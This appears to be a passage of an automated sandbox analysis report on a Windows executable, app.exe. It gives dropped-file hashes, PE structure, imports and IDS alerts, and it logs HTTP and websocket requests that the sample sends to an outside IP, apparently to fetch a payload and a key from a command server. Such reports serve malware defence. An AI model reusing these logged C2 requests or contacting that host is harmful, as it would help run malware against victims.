                                                                                                                                                                                                          SHA-512:E8B755A2A2884354575D860B3E6246B9C158E1441BB2633A27D7269946179CC88C1B469591218A29A703282AF8018F1786C32718DF8E647B15A9A8C608736113
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............\...\...\..}\...\...]...\'..]...\...]...\...]...\...]...\-..]...\...\...\N..]...\N..]...\N..\...\N..]...\Rich...\................PE..d....g.a.........." .....Z..........L........................................@............`..........................................P..X...(Q....... ...........B...........0..........................................8............p..8............................text...XY.......Z.................. ..`.rdata.......p.......^..............@..@.data....m...`...h...H..............@....pdata...B.......D..................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\zstandard\backend_c.cp38-win_amd64.pyd

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):661504
                                                                                                                                                                                                          Entropy (8bit):6.420428803400377
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:ltcSA9OcfdMkwi3F3EmIXZn8oMyK+BCXnA3M8fMJoBWhZs2:ltc59/akwuIGyK+BCXnA3
                                                                                                                                                                                                          MD5:F26BF22BD451DEF507E83536AEE14EED
                                                                                                                                                                                                          SHA1:53402BEFBE817A1ADB359C7B159B4C5AC2055003
                                                                                                                                                                                                          SHA-256:05BB0130F6B40EE2B07BC615F15212D57F63D4EBD0C371E330CBBFC6BBC4D89D
                                                                                                                                                                                                          SHA-512:45B6383D4B85D54452E8D81D1F42D5EC821659722B7A455ABB3CE5B7FCA79DD167CA535112106B63F68899C281FE5978CBB445D6AF500EC4188F4E049724B9E4
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u.....Z...Z...Z.l.Z...Z.a.[...ZSf.[...Z.a.[...Z.a.[...Z.a.[...ZY`.[...Z...Z...Z:a.[...Z:a.[...Z:aaZ...Z:a.[...ZRich...Z........PE..d....g.a.........." .........t......L........................................`............`.........................................@N..`....N.......@..........d8...........P..........................................8............... ............................text............................... ..`.rdata.............................@..@.data........`.......H..............@....pdata..d8.......:..................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\ozu0vj56

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                          Entropy (8bit):2.0
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:qn:qn
                                                                                                                                                                                                          MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                                                                                                                                                                                                          SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                                                                                                                                                                                                          SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                                                                                                                                                                                                          SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:blat

                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                          General

                                                                                                                                                                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Entropy (8bit):7.997412854456683
                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                          File name:app.exe
                                                                                                                                                                                                          File size:27'056'395 bytes
                                                                                                                                                                                                          MD5:ee3f845b0064d326c91bc200fe87fa2e
                                                                                                                                                                                                          SHA1:e9d99e982eef27dea832f38a3ba8e0b25ff3fc8e
                                                                                                                                                                                                          SHA256:134ef7be21da1bf756cc595ddd67b1caedda2ab4bb200ef9bbec5173aff7ffb1
                                                                                                                                                                                                          SHA512:9b451bda043059e36bf2d72461394c4f50cda757364667103b32b4600963a27971d0bea53a329a9a761d3b746d9d0771edc2ef312b560329859c676fcbfcad75
                                                                                                                                                                                                          SSDEEP:786432:j7r49xSIt++Kyi1UgH7JTBr6xoy2A+mtjPc10Pga:jgiL+diqgHpBVyxBzc10Pga
                                                                                                                                                                                                          TLSH:C357334592908D8DF8B5523ECA061535EAB3F9201B10D09F4AA7B87E7F037F28B5DE91
                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........:.f}i.f}i.f}i..~h.f}i..xhSf}i..yh.f}i...i.f}i..xh.f}i..yh.f}i..~h.f}i..|h.f}i.f|igf}i..yh.f}i...h.f}iRich.f}i...............

                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                          Icon Hash:4a464cd47461e179

                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Entrypoint:0x14000afb0
                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                          Time Stamp:0x66B4D574 [Thu Aug 8 14:25:56 2024 UTC]
                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                                          OS Version Minor:2
                                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                                          File Version Minor:2
                                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                                          Subsystem Version Minor:2
                                                                                                                                                                                                          Import Hash:a6cec5b1a631d592d80900ab7e1de8df

                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                          sub esp, 28h
                                                                                                                                                                                                          call 00007FB8FCD6363Ch
                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                          add esp, 28h
                                                                                                                                                                                                          jmp 00007FB8FCD62FAFh
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          inc eax
                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                          sub esp, 20h
                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                          mov ebx, ecx
                                                                                                                                                                                                          xor ecx, ecx
                                                                                                                                                                                                          call dword ptr [0001F20Bh]
                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                          mov ecx, ebx
                                                                                                                                                                                                          call dword ptr [0001F1FAh]
                                                                                                                                                                                                          call dword ptr [0001F16Ch]
                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                          mov ecx, eax
                                                                                                                                                                                                          mov edx, C0000409h
                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                          add esp, 20h
                                                                                                                                                                                                          pop ebx
                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                          jmp dword ptr [0001F1F0h]
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                          mov dword ptr [esp+08h], ecx
                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                          sub esp, 38h
                                                                                                                                                                                                          mov ecx, 00000017h
                                                                                                                                                                                                          call dword ptr [0001F1DCh]
                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                          je 00007FB8FCD63139h
                                                                                                                                                                                                          mov ecx, 00000002h
                                                                                                                                                                                                          int 29h
                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                          lea ecx, dword ptr [0004106Ah]
                                                                                                                                                                                                          call 00007FB8FCD632FEh
                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                          mov eax, dword ptr [esp+38h]
                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                          mov dword ptr [00041151h], eax
                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                          lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                          add eax, 08h
                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                          mov dword ptr [000410E1h], eax
                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                          mov eax, dword ptr [0004113Ah]
                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                          mov dword ptr [00040FABh], eax
                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                          mov eax, dword ptr [esp+40h]
                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                          mov dword ptr [000410AFh], eax
                                                                                                                                                                                                          mov dword ptr [00040F85h], C0000409h
                                                                                                                                                                                                          mov dword ptr [00040F7Fh], 00000001h
                                                                                                                                                                                                          mov dword ptr [00000089h], 00000000h

                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3bc940x78.rdata
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000xf494.rsrc
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x4e0000x20c4.pdata
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x620000x758.reloc
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x394200x1c.rdata
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x392e00x140.rdata
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x2a0000x418.rdata
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                          Sections

                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                          .text0x10000x287200x28800bde1e371902cf81ea9be7e3f95382cfdFalse0.5581657503858025data6.484685085891853IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .rdata0x2a0000x12a9e0x12c001a246421e8d0c7b1f36cd1b5f78e7864False0.5159765625data5.8203348191135IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .data0x3d0000x103e80xe00baf7e08c61eeb50b5a3978422561c938False0.13113839285714285data1.8069121639354628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                          .pdata0x4e0000x20c40x2200306be8c7742d2c9622517b124ebf3ac1False0.4775965073529412data5.330382837068586IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          _RDATA0x510000x15c0x200e9000b5de7c8ee475c9ff9bfd52a2223False0.392578125data2.7647001855526416IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .rsrc0x520000xf4940xf600064ef86623bc924db980569fbb06041fFalse0.8034965701219512data7.555563756301485IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .reloc0x620000x7580x800bc11f54c2d33adf3a95c6af00e70eb22False0.5390625data5.236213438241001IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                          Resources

                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                          RT_ICON0x522080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.585820895522388
                                                                                                                                                                                                          RT_ICON0x530b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.7360108303249098
                                                                                                                                                                                                          RT_ICON0x539580x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.755057803468208
                                                                                                                                                                                                          RT_ICON0x53ec00x952cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9975384937676757
                                                                                                                                                                                                          RT_ICON0x5d3ec0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.3887966804979253
                                                                                                                                                                                                          RT_ICON0x5f9940x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.49530956848030017
                                                                                                                                                                                                          RT_ICON0x60a3c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.7207446808510638
                                                                                                                                                                                                          RT_GROUP_ICON0x60ea40x68data0.7019230769230769
                                                                                                                                                                                                          RT_MANIFEST0x60f0c0x588XML 1.0 document, ASCII text, with CRLF line terminators0.4456214689265537

                                                                                                                                                                                                          Imports

                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                          USER32.dllCreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                          COMCTL32.dll
                                                                                                                                                                                                          KERNEL32.dllIsValidCodePage, GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, GetACP, GetOEMCP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetCPInfo, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEndOfFile, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
                                                                                                                                                                                                          ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                                          GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW

                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                          2024-11-12T16:50:19.161491+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.549708TCP
                                                                                                                                                                                                          2024-11-12T16:51:00.524914+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.564106TCP

                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          Nov 12, 2024 16:50:06.124146938 CET497055000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:06.129146099 CET500049705116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:06.129231930 CET497055000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:06.130069971 CET497055000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:06.134864092 CET500049705116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.089440107 CET500049705116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.089533091 CET500049705116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.089545965 CET500049705116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.089555979 CET500049705116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.089584112 CET497055000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.089622021 CET497055000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.089627981 CET500049705116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.089639902 CET500049705116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.089672089 CET497055000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.089745045 CET500049705116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.089756012 CET500049705116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.089766026 CET500049705116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.089778900 CET500049705116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.089801073 CET497055000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.089814901 CET497055000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.094577074 CET500049705116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.094594955 CET500049705116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.094644070 CET497055000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.273375034 CET500049705116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.273391962 CET500049705116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.273402929 CET500049705116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.273416042 CET500049705116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.273479939 CET497055000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.273525000 CET497055000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.273530960 CET500049705116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.273569107 CET500049705116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.273619890 CET497055000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.275789976 CET497065000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.280818939 CET500049706116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.280939102 CET497065000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.281018019 CET497065000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.286356926 CET500049706116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.240978003 CET500049706116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.283884048 CET497065000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.427819014 CET500049706116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.428258896 CET497055000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.435295105 CET500049705116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.435355902 CET497055000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.471364021 CET497065000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.565599918 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.570580959 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.570666075 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.570816994 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.575584888 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:09.543019056 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:09.548814058 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:09.553881884 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:19.535305977 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:19.540805101 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:29.534214973 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:29.539021969 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:39.549844027 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:39.555354118 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:49.549848080 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:49.806898117 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:59.566390991 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:59.571224928 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:51:09.628536940 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:51:09.633605003 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:51:19.627985001 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:51:19.636013031 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:51:29.643758059 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:51:29.648780107 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:51:39.643537045 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:51:39.648566961 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:51:49.643471003 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:51:49.648452997 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:51:59.659029961 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:51:59.664134026 CET500049707116.198.204.121192.168.2.5

                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          Nov 12, 2024 16:50:22.306814909 CET53640641.1.1.1192.168.2.5

                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                          • https:
                                                                                                                                                                                                            • 116.198.204.121:5000

                                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          0192.168.2.549705116.198.204.12150004308C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 12, 2024 16:50:06.130069971 CET516OUTGET /102019base HTTP/1.1
                                                                                                                                                                                                          Host: 116.198.204.121:5000
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Authorization: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJvWjlKaXdSVW1vdl9GTl8wSWVHTlBSWUh4d1ZVIiwiZXhwIjoxNjYyODY2NjM5fQ.3iOvX3R5vcdlxd9IIHnzXiVV7ZY6ipgSuBNt3daR51w
                                                                                                                                                                                                          Content-Type: application/json;charset=UTF-8
                                                                                                                                                                                                          Referer: https://www.baidu.com/
                                                                                                                                                                                                          Cookie: sid=079cbb01-8f44-4dc6-8fd0-3df76e4ee289
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.089440107 CET119INHTTP/1.1 200 OK
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Content-Length: 17824
                                                                                                                                                                                                          Date: Tue, 12 Nov 2024 15:50:06 GMT


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          1192.168.2.549706116.198.204.12150004308C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.281018019 CET515OUTGET /102019key HTTP/1.1
                                                                                                                                                                                                          Host: 116.198.204.121:5000
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Authorization: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJvWjlKaXdSVW1vdl9GTl8wSWVHTlBSWUh4d1ZVIiwiZXhwIjoxNjYyODY2NjM5fQ.3iOvX3R5vcdlxd9IIHnzXiVV7ZY6ipgSuBNt3daR51w
                                                                                                                                                                                                          Content-Type: application/json;charset=UTF-8
                                                                                                                                                                                                          Referer: https://www.baidu.com/
                                                                                                                                                                                                          Cookie: sid=079cbb01-8f44-4dc6-8fd0-3df76e4ee289
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.240978003 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Content-Length: 16
                                                                                                                                                                                                          Date: Tue, 12 Nov 2024 15:50:08 GMT


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          2192.168.2.549707116.198.204.12150004308C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.570816994 CET210OUTGET /xiewangzhenyan HTTP/1.1
                                                                                                                                                                                                          Upgrade: websocket
                                                                                                                                                                                                          Host: 116.198.204.121:5000
                                                                                                                                                                                                          Origin: http://116.198.204.121:5000
